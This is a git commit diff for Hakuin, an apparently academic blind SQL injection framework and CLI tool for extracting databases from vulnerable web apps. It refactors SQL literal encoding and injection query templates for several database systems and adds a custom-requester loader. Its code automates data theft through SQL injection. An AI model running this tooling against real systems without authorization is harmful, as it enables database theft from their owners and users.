
regression tests, custom requester in hk, build refactor, restructure, bug fixes

Jakub Pruzinec 2024-07-25 17:58:16 +02:00
parent 3b7b76dcbf
commit 1a8fc920d7
126 changed files with 1287 additions and 1112 deletions


@@ -2,7 +2,7 @@
<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework and tool written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism, and more.
Hakuin has been presented at esteemed academic and industrial conferences:
- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
@@ -16,17 +16,26 @@ More information can be found in our [paper](https://github.com/pruzko/hakuin/bl
To install Hakuin, simply run:
```
pip3 install hakuin
hk -h
```
Developers should install the package locally and set the `-e` flag for editable mode:
Note that installation is optional and you can use Hakuin directly from the source code:
```
git clone git@github.com:pruzko/hakuin.git
git clone https://github.com/pruzko/hakuin
cd hakuin
pip3 install -e .
python3 hk.py -h
```
## Command Line Tool
Hakuin ships with an intuitive tool called `hk` that offers most of Hakuin's features directly from the command line. To find out more, run:
```
hk -h
```
## Examples
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the `Requester` and override the `request` method. Also, the method must determine whether the query resolved to `True` or `False`.
## Custom Scripting
Sometimes, BSQLI vulnerabilities are too tricky to be exploited from the command line and require custom scripting. This is where Hakuin's Python package shines, giving you total control over the extraction process.
To customize exploitation, you need to instruct Hakuin on how to inject its queries. This is done by deriving a class from the `Requester` and overriding the `request` method. Aside from injecting queries, the method must determine whether they resolved to `True` or `False`.
##### Example 1 - Query Parameter Injection with Status-based Inference
@@ -61,10 +70,7 @@ class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
ext = Extractor(requester=StatusRequester(), dbms=SQLite())
...
if __name__ == '__main__':
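For reference, a fully fleshed-out status-based requester might look like the sketch below. This is a minimal illustration, not the repository's exact example: the target URL and injection point are hypothetical, and it assumes `aiohttp` as the HTTP client, like the built-in requester.
```python
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # Inject the query into the vulnerable parameter (hypothetical URL)
        # and infer the query result from the response status code.
        url = f'http://vuln.example/?id=1 AND ({query})'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as resp:
                return resp.status == 200
```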
@@ -73,72 +79,39 @@ if __name__ == '__main__':
Now that everything is set, you can start extracting DB metadata.
##### Example 1 - Extracting DB Schemas
##### Example 1 - Extracting DB Schemas/Tables/Columns
```python
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
schema_names = await ext.extract_schema_names(strategy='model') # extracts schema names
tables = await ext.extract_table_names(strategy='model') # extracts table names
columns = await ext.extract_column_names(table='users', strategy='model') # extracts column names
metadata = await ext.extract_meta(strategy='model') # extracts all table and column names
```
##### Example 2 - Extracting Tables
```python
tables = await ext.extract_table_names(strategy='model')
```
Once you know the DB structure, you can extract the actual content.
##### Example 3 - Extracting Columns
```python
columns = await ext.extract_column_names(table='users', strategy='model')
```
##### Example 4 - Extracting Tables and Columns Together
```python
metadata = await ext.extract_meta(strategy='model')
```
Once you know the structure, you can extract the actual content.
##### Example 1 - Extracting Generic Columns
##### Example 1 - Extracting Column Data
```python
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
```
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic') # detects types and extracts columns
##### Example 2 - Extracting Textual Columns
```python
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
```
##### Example 3 - Extracting Integer Columns
```python
res = await ext.extract_column_int(table='users', column='id')
```
##### Example 4 - Extracting Float Columns
```python
res = await ext.extract_column_float(table='products', column='price')
```
##### Example 5 - Extracting Blob (Binary Data) Columns
```python
res = await ext.extract_column_blob(table='users', column='id')
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic') # extracts text columns
res = await ext.extract_column_int(table='users', column='id') # extracts int columns
res = await ext.extract_column_float(table='products', column='price') # extracts float columns
res = await ext.extract_column_blob(table='users', column='id') # extracts blob columns
```
More examples can be found in the `tests` directory.
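Putting the fragments together, a compressed end-to-end script might look like this. It is a sketch, assuming the hypothetical `StatusRequester` from above is defined in the same file:
```python
import asyncio
from hakuin import Extractor
from hakuin.dbms import SQLite

async def main():
    ext = Extractor(requester=StatusRequester(), dbms=SQLite())
    # Map out the schema first, then pull the interesting columns.
    meta = await ext.extract_meta(strategy='model')
    addresses = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    print(meta, addresses)

if __name__ == '__main__':
    asyncio.run(main())
```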
## Using Hakuin from the Command Line
Hakuin comes with a simple wrapper tool, `hk.py`, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
```
python3 hk.py -h
```
## For Researchers
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.


@@ -1,5 +1,4 @@
import asyncio
import logging
import os
import pickle
@@ -41,13 +40,9 @@ class Model:
Params:
file (str): model file
'''
logging.info(f'Loading model "{file}".')
with open(file, 'rb') as f:
self.model = pickle.load(f)
logging.info(f'Model loaded.')
async def scores(self, context):
'''Calculates likelihood distribution of next value.


@@ -19,3 +19,21 @@ class Requester(metaclass=ABCMeta):
bool: query result
'''
raise NotImplementedError()
class HKRequester(Requester):
'''Abstract class for requesters that can be loaded by hk.py.'''
def __init__(self):
'''Constructor.'''
self.n_requests = 0
async def initialize(self):
'''Async initialization. This method is called by "hk.py"'''
pass
async def cleanup(self):
'''Async clean-up. This method is called by "hk.py"'''
pass
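To make the lifecycle concrete, a minimal `HKRequester` subclass usable with `hk.py`'s `-R path/to/requester.py:ClassName` option could look like the sketch below. The module name, class name, and target URL are hypothetical, and `aiohttp` is assumed, mirroring the built-in requester:
```python
# my_requester.py -- hypothetical module, loaded via: -R my_requester.py:MyRequester
import aiohttp
from hakuin import HKRequester

class MyRequester(HKRequester):
    async def initialize(self):
        # Called by hk.py before extraction starts.
        self.http = aiohttp.ClientSession()

    async def cleanup(self):
        # Called by hk.py once extraction finishes.
        await self.http.close()

    async def request(self, ctx, query):
        self.n_requests += 1    # counter provided by HKRequester
        url = f'http://vuln.example/?id=1 AND ({query})'
        async with self.http.get(url) as resp:
            return resp.status == 200
```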


@@ -1,4 +1,4 @@
from hakuin.Model import Model
from hakuin.Model import get_model_tables, get_model_columns, get_model_schemas
from hakuin.Extractor import Extractor
from hakuin.Requester import Requester
from hakuin.Requester import Requester, HKRequester


@@ -1,5 +1,6 @@
import asyncio
import logging
import tqdm
import sys
from abc import ABCMeta, abstractmethod
from copy import deepcopy
@@ -73,7 +74,7 @@ class Collector(metaclass=ABCMeta):
Returns:
list: column rows
'''
logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
tqdm.tqdm.write(f'Extracting [{ctx.table}].[{ctx.column}]', file=sys.stderr)
if ctx.n_rows is None:
ctx.n_rows = await NumericBinarySearch(
@@ -88,15 +89,16 @@
if ctx.rows_have_null is None:
ctx.rows_have_null = await self.check_rows_have_null(ctx)
data = [None] * ctx.n_rows
await asyncio.gather(
*[self.task_collect_row(deepcopy(ctx), data) for _ in range(self.n_tasks)]
)
with tqdm.tqdm(total=ctx.n_rows, file=sys.stderr, leave=False) as progress:
data = [None] * ctx.n_rows
await asyncio.gather(
*[self._task_collect_row(deepcopy(ctx), data, progress) for _ in range(self.n_tasks)]
)
return data
async def task_collect_row(self, ctx, data):
async def _task_collect_row(self, ctx, data, progress):
while True:
async with self._row_idx_ctr_lock:
if self._row_idx_ctr >= ctx.n_rows:
@@ -112,7 +114,8 @@
async with self._data_lock:
data[ctx.row_idx] = res
logging.info(f'({ctx.row_idx + 1}/{ctx.n_rows}) "{ctx.table}.{ctx.column}": {res}')
progress.update(1)
progress.write(f'({ctx.row_idx + 1}/{ctx.n_rows}) [{ctx.table}].[{ctx.column}]: {res}', file=sys.stderr)
@abstractmethod
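The changed collector logic above follows a simple fan-out pattern: N tasks repeatedly claim the next row index under a lock and write their result into a shared list. A distilled, self-contained version of that pattern (names simplified from `_task_collect_row`):
```python
import asyncio

async def collect_rows(n_rows, n_tasks, fetch_row):
    idx_lock = asyncio.Lock()   # guards the shared row cursor
    next_idx = 0
    data = [None] * n_rows

    async def worker():
        nonlocal next_idx
        while True:
            async with idx_lock:
                if next_idx >= n_rows:
                    return          # all rows have been claimed
                row_idx = next_idx
                next_idx += 1
            data[row_idx] = await fetch_row(row_idx)

    await asyncio.gather(*[worker() for _ in range(n_tasks)])
    return data
```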


@@ -1,57 +0,0 @@
import asyncio
import os
import pickle
from nltk.lm import MLE
import hakuin
DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_DATA = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_CORPORA = os.path.join(DIR_DATA, 'corpora')
DIR_MODELS = os.path.join(DIR_DATA, 'models')
def fetch_data(fname):
with open(fname, 'r') as f:
data = [l.strip() for l in f]
data = [d.split(',') for d in data]
data = [x for d in data for x in [d[0]] * int(d[1])]
return data
async def main():
print('Schemas...')
data = fetch_data(os.path.join(DIR_CORPORA, 'schemas.csv'))
m = hakuin.Model(5)
await m.fit_data(data)
with open(os.path.join(DIR_MODELS, 'model_schemas.pkl'), 'wb') as f:
pickle.dump(m.model, f)
print('Done.')
print('Tables...')
data = fetch_data(os.path.join(DIR_CORPORA, 'tables.csv'))
m = hakuin.Model(5)
await m.fit_data(data)
with open(os.path.join(DIR_MODELS, 'model_tables.pkl'), 'wb') as f:
pickle.dump(m.model, f)
print('Done.')
print('Columns...')
data = fetch_data(os.path.join(DIR_CORPORA, 'columns.csv'))
m = hakuin.Model(5)
await m.fit_data(data)
with open(os.path.join(DIR_MODELS, 'model_columns.pkl'), 'wb') as f:
pickle.dump(m.model, f)
print('Done.')
if __name__ == '__main__':
asyncio.run(main())


@@ -1,17 +0,0 @@
{% set single_row = true %}
{% extends 'base.jinja' %}
{% block select %}
SELECT CASE WHEN
{% if not has_eos %}
{{ column | sql_to_varchar | sql_len }} != {{ ctx.buffer | length }}
AND
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% elif not values %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
{% else %}
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% endif %}
THEN 1 ELSE 0 END
{% endblock %}


@@ -3,7 +3,7 @@ import re
import jinja2
from abc import ABCMeta, abstractmethod
from hakuin.utils import DIR_QUERIES, BYTE_MAX
from hakuin.utils import BYTE_MAX
@@ -31,18 +31,18 @@ class DBMS(metaclass=ABCMeta):
self.jj.filters['sql_to_unicode'] = self.sql_to_unicode
@staticmethod
def normalize(s):
return DBMS._RE_NORMALIZE.sub(' ', s).strip()
@classmethod
def normalize(cls, s):
return cls._RE_NORMALIZE.sub(' ', s).strip()
# Template Filters
@staticmethod
def sql_escape(s):
@classmethod
def sql_escape(cls, s):
if s is None:
return None
if DBMS._RE_ESCAPE.match(s):
if cls._RE_ESCAPE.match(s):
return s
assert ']' not in s, f'Cannot escape "{s}"'
@@ -50,7 +50,7 @@ class DBMS(metaclass=ABCMeta):
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"x'{s.encode('utf-8').hex()}'"
return f"'{s}'"
@@ -75,9 +75,9 @@ class DBMS(metaclass=ABCMeta):
def sql_in_str(s, string):
return f'instr({string}, {s})'
@staticmethod
def sql_in_str_set(s, strings):
return f'{s} in ({",".join([DBMS.sql_str_lit(x) for x in strings])})'
@classmethod
def sql_in_str_set(cls, s, strings):
return f'{s} in ({",".join([cls.sql_str_lit(x) for x in strings])})'
@staticmethod
def sql_is_ascii(s):
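The `@staticmethod` to `@classmethod` switch here is what lets dialect subclasses customize literal encoding without re-implementing the helpers: `cls.sql_str_lit(...)` resolves to the subclass override, whereas the old hardcoded `DBMS.sql_str_lit(...)` always used the base implementation. A stripped-down illustration (toy classes, not the actual Hakuin ones):
```python
class Base:
    @classmethod
    def str_lit(cls, s):
        return f"'{s}'"

    @classmethod
    def in_str_set(cls, s, strings):
        # cls.str_lit dispatches to the subclass override
        return f'{s} in ({",".join(cls.str_lit(x) for x in strings)})'

class HexDialect(Base):
    @classmethod
    def str_lit(cls, s):
        return f"x'{s.encode().hex()}'"

print(Base.in_str_set('col', ['a']))        # col in ('a')
print(HexDialect.in_str_set('col', ['a']))  # col in (x'61')
```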


@@ -27,9 +27,9 @@ class MSSQL(DBMS):
# Template Filters
@staticmethod
def sql_str_lit(s):
if not s.isascii() or "'" in s:
hex_str = s.encode('cp1252').hex()
return f'convert(varchar(MAX), 0x{hex_str})'
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
hex_str = s.encode('utf-16').hex()
return f'convert(nvarchar(MAX), 0x{hex_str})'
return f"'{s}'"
@staticmethod
@@ -42,21 +42,21 @@
@staticmethod
def sql_in_str(s, string):
return f'charindex({s},{string} COLLATE Latin1_General_BIN)'
return f'charindex({s},{string} COLLATE Latin1_General_CS_AS)'
@staticmethod
def sql_in_str_set(s, strings):
return f'{s} COLLATE Latin1_General_BIN in ({",".join([MSSQL.sql_str_lit(x) for x in strings])})'
@classmethod
def sql_in_str_set(cls, s, strings):
return f'{s} COLLATE Latin1_General_CS_AS in ({",".join([cls.sql_str_lit(x) for x in strings])})'
@staticmethod
def sql_is_ascii(s):
# MSSQL does not have a native "isascii" function. As a workaround we try to look for
# non-ascii characters with "%[^\x00-\x7f]%" patterns.
return f'CASE WHEN patindex(\'%[^\'+char(0x00)+\'-\'+char(0x7f)+\']%\' COLLATE Latin1_General_BIN,{s}) = 0 THEN 1 ELSE 0 END'
return f"CASE WHEN patindex('%[^'+char(0x00)+'-'+char(0x7f)+']%' COLLATE Latin1_General_BIN,{s}) = 0 THEN 1 ELSE 0 END"
@staticmethod
def sql_to_varchar(s):
return f'cast({s} as varchar(MAX))'
return f'convert(nvarchar(MAX), {s})'
# Queries
@@ -73,7 +73,7 @@ class MSSQL(DBMS):
return self.q_column_type_in_str_set(ctx, types=types)
def q_column_is_text(self, ctx):
types = ['char', 'nchar' 'varchar', 'nvarchar', 'text', 'ntext']
types = ['char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext']
return self.q_column_type_in_str_set(ctx, types=types)
def q_column_is_blob(self, ctx):
@@ -115,7 +115,6 @@ class MSSQL(DBMS):
def q_string_in_set(self, ctx, values):
query = self.jj_mssql.get_template('string_in_set.jinja').render(ctx=ctx, values=values)
print(self.normalize(query))
return self.normalize(query)
def q_int_lt(self, ctx, n):


@@ -37,7 +37,7 @@ class MySQL(DBMS):
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"x'{s.encode('utf-8').hex()}'"
return f"'{s}'"
@@ -122,7 +122,6 @@ class MySQL(DBMS):
def q_string_in_set(self, ctx, values):
query = self.jj_mysql.get_template('string_in_set.jinja').render(ctx=ctx, values=values)
print(self.normalize(query))
return self.normalize(query)
def q_int_lt(self, ctx, n):


@@ -31,7 +31,7 @@ class PSQL(DBMS):
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"convert_from('\\x{s.encode('utf-8').hex()}', 'UTF8')"
return f"'{s}'"


@@ -20,7 +20,7 @@ class SQLite(DBMS):
# Template Filters
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"cast(x'{s.encode('utf-8').hex()}' as TEXT)"
return f"'{s}'"
@@ -29,9 +29,9 @@ class SQLite(DBMS):
assert n in range(BYTE_MAX + 1), f'n must be in [0, {BYTE_MAX}]'
return f"x'{n:02x}'"
@staticmethod
def sql_in_str_set(s, strings):
return f'{s} in ({",".join([SQLite.sql_str_lit(x) for x in strings])})'
@classmethod
def sql_in_str_set(cls, s, strings):
return f'{s} in ({",".join([cls.sql_str_lit(x) for x in strings])})'
@staticmethod
def sql_is_ascii(s):
@@ -52,7 +52,7 @@ class SQLite(DBMS):
return self.q_column_type_in_str_set(ctx, types=['integer'])
def q_column_is_float(self, ctx):
return self.q_column_type_in_str_set(ctx, types=['real'])
return self.q_column_type_in_str_set(ctx, types=['real', 'float'])
def q_column_is_text(self, ctx):
return self.q_column_type_in_str_set(ctx, types=['text'])


@@ -45,7 +45,7 @@
{% block offset %}
{% if single_row %}
ORDER BY {{ column | sql_to_varchar }}
ORDER BY (SELECT NULL)
OFFSET {{ ctx.row_idx }} ROWS
FETCH NEXT 1 ROWS ONLY
{% endif %}


@@ -5,12 +5,12 @@
{% block select %}
SELECT CASE WHEN
{% if not has_eos %}
{{ column | sql_to_varchar | sql_len }} != {{ ctx.buffer | length }}
AND
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% elif not values %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
{% else %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
OR
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% endif %}
THEN 1 ELSE 0 END


@@ -0,0 +1,17 @@
{% set single_row = true %}
{% extends 'base.jinja' %}
{% block select %}
SELECT CASE WHEN
{% if not has_eos %}
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% elif not values %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
{% else %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
OR
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% endif %}
THEN 1 ELSE 0 END
{% endblock %}


@@ -5,8 +5,9 @@ import string
DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
DIR_QUERIES = os.path.join(DIR_ROOT, 'data', 'queries')
DIR_QUERIES = os.path.join(DIR_ROOT, 'dbms', 'queries')
DIR_MODELS = os.path.join(DIR_ROOT, 'models')
DIR_MODELS = DIR_MODELS if os.path.isdir(DIR_MODELS) else os.path.abspath(os.path.join(DIR_ROOT, '..', 'models'))
ASCII_MAX = 0x7f
UNICODE_MAX = 0x10ffff

hk.py

@@ -1,15 +1,18 @@
import argparse
import asyncio
import importlib.util
import inspect
import json
import logging
import re
import requests
import sys
import tqdm
import urllib.parse
import aiohttp
from hakuin.dbms import SQLite, MySQL, MSSQL, PSQL
from hakuin import Extractor, Requester
from hakuin import Extractor, HKRequester
@@ -19,13 +22,14 @@ class BytesEncoder(json.JSONEncoder):
class UniversalRequester(Requester):
class UniversalRequester(HKRequester):
RE_INFERENCE = re.compile(r'^(not_)?(.+):(.*)$')
RE_QUERY_TAG = re.compile(r'{query}')
def __init__(self, http, args):
self.http = http
def __init__(self, args):
super().__init__()
self.http = None
self.url = args.url
self.method = args.method
self.headers = self._process_dict(args.headers)
@@ -33,12 +37,16 @@
self.body = args.body
self.inference = self._process_inference(args.inference)
self.dbg = args.dbg
self.n_requests = 0
@staticmethod
async def _init_http():
return aiohttp.ClientSession()
async def initialize(self):
self.http = aiohttp.ClientSession()
async def cleanup(self):
if self.http:
await self.http.close()
self.http = None
def _process_dict(self, dict_str):
@@ -70,13 +78,15 @@
async def request(self, ctx, query):
self.n_requests += 1
url = self.RE_QUERY_TAG.sub(requests.utils.quote(query), self.url)
url = self.RE_QUERY_TAG.sub(urllib.parse.quote(query), self.url)
headers = {self.RE_QUERY_TAG.sub(query, k): self.RE_QUERY_TAG.sub(query, v) for k, v in self.headers.items()}
cookies = {self.RE_QUERY_TAG.sub(query, k): self.RE_QUERY_TAG.sub(query, v) for k, v in self.cookies.items()}
body = self.RE_QUERY_TAG.sub(query, self.body) if self.body else None
async with self.http.request(method=self.method, url=url, headers=headers, cookies=cookies, data=body) as resp:
assert resp.status in [200, 404], 'TODO DELME'
if resp.status not in [200, 404]:
tqdm.tqdm.write(f'(err) {query}')
raise AssertionError(f'Invalid response code: {resp.status}')
if self.inference['type'] == 'status':
result = resp.status == self.inference['content']
@@ -90,7 +100,7 @@
result = not result
if self.dbg:
print(result, '(err)' if resp.status == 500 else '', query, file=sys.stderr)
tqdm.tqdm.write(f'{self.n_requests} {"(err)" if resp.status == 500 else str(result)[0]} {query}')
return result
@@ -109,16 +119,24 @@ class HK:
self.ext = None
async def main(self, args):
async with aiohttp.ClientSession() as http:
requester = UniversalRequester(http, args)
dbms = self.DBMS_DICT[args.dbms]()
self.ext = Extractor(requester, dbms, args.tasks)
async def run(self, args):
if args.requester:
requester = self._load_requester(args)
else:
requester = UniversalRequester(args)
await self._main(args)
await requester.initialize()
dbms = self.DBMS_DICT[args.dbms]()
self.ext = Extractor(requester, dbms, args.tasks)
try:
await self._run(args)
finally:
await requester.cleanup()
async def _main(self, args):
async def _run(self, args):
if args.extract == 'data':
if args.column:
res = await self.ext.extract_column(table=args.table, column=args.column, schema=args.schema, text_strategy=args.text_strategy)
@@ -135,7 +153,12 @@ class HK:
elif args.extract == 'columns':
res = await self.ext.extract_column_names(table=args.table, schema=args.schema, strategy=args.meta_strategy)
print(f'Number of requests: {self.ext.requester.n_requests}')
res = {
'stats': {
'n_requests': self.ext.requester.n_requests,
},
'data': res,
}
print(json.dumps(res, cls=BytesEncoder, indent=4))
@@ -157,8 +180,27 @@ class HK:
return res
def _load_requester(self, args):
assert ':' in args.requester, f'Invalid requester format (path/to/requester.py:MyHKRequesterClass): "{args.requester}"'
req_path, req_cls = args.requester.rsplit(':', -1)
if __name__ == '__main__':
spec = importlib.util.spec_from_file_location('_custom_requester', req_path)
assert spec, f'Failed to locate "{req_path}"'
module = importlib.util.module_from_spec(spec)
assert module, f'Failed to locate "{req_path}"'
spec.loader.exec_module(module)
for cls_name, obj in inspect.getmembers(module, inspect.isclass):
if cls_name != req_cls:
continue
if issubclass(obj, HKRequester) and obj is not HKRequester:
return obj()
raise ValueError(f'HKRequester class "{req_cls}" not found in "{req_path}".')
def main():
parser = argparse.ArgumentParser(description='A simple wrapper to easily call Hakuin\'s basic functionality.')
parser.add_argument('url', help='URL pointing to a vulnerable endpoint. The URL can contain the {query} tag, which will be replaced with injected queries.')
parser.add_argument('-T', '--tasks', default=1, type=int, help='Run several coroutines in parallel.')
@@ -167,7 +209,7 @@ if __name__ == '__main__':
parser.add_argument('-H', '--headers', help='Headers attached to requests. The header names and values can contain the {query} tag.')
parser.add_argument('-C', '--cookies', help='Cookies attached to requests. The cookie names and values can contain the {query} tag.')
parser.add_argument('-B', '--body', help='Request body. The body can contain the {query} tag.')
parser.add_argument('-i', '--inference', required=True, help=''
parser.add_argument('-i', '--inference', help=''
'Inference method that determines the results of injected queries. The method must be in the form of "<TYPE>:<CONTENT>", where the <TYPE> '
'can be "status", "header", or "body" and the <CONTENT> can be a status code or a string to look for in HTTP responses. Also, the <TYPE> '
'can be prefixed with "not_" to negate the expression. Examples: "status:200" (check if the response status code is 200), "not_status:404" '
@@ -189,6 +231,8 @@
'Use this strategy to extract text columns. If not provided, "dynamic" is used.'
)
parser.add_argument('-R', '--requester', help='Use custom HKRequester class (see Requester.py) instead of the default one. '
'Example: path/to/requester.py:MyHKRequesterClass')
# parser.add_argument('-o', '--out', help='Output directory.')
parser.add_argument('--dbg', action='store_true', help='Print debug information to stderr.')
args = parser.parse_args()
@@ -208,5 +252,11 @@
assert args.tasks > 0, 'The --tasks parameter must be positive.'
assert args.inference or args.requester, 'You must provide -i/--inference or -R/--requester.'
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(HK().main(args))
asyncio.get_event_loop().run_until_complete(HK().run(args))
if __name__ == '__main__':
main()

models/train_models.py

@@ -0,0 +1,41 @@
import asyncio
import os
import pickle
import sys
import tqdm
from nltk.lm import MLE
from hakuin import Model
from hakuin.utils import DIR_MODELS
DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_CORPORA = os.path.join(DIR_ROOT, 'corpora')
def fetch_data(fname):
with open(fname, 'r') as f:
data = [l.strip() for l in f]
data = [d.split(',') for d in data]
data = [x for d in data for x in [d[0]] * int(d[1])]
return data
async def main():
for m_type in tqdm.tqdm(['schemas', 'tables', 'columns']):
tqdm.tqdm.write(f'Training {m_type}. This may take a while...', file=sys.stderr)
data = fetch_data(os.path.join(DIR_CORPORA, f'{m_type}.csv'))
m = Model(5)
await m.fit_data(data)
tqdm.tqdm.write(f'Saving {m_type}...', file=sys.stderr)
with open(os.path.join(DIR_MODELS, f'model_{m_type}.pkl'), 'wb') as f:
pickle.dump(m.model, f)
tqdm.tqdm.write(f'Done.', file=sys.stderr)
if __name__ == '__main__':
asyncio.run(main())

Some files were not shown because too many files have changed in this diff.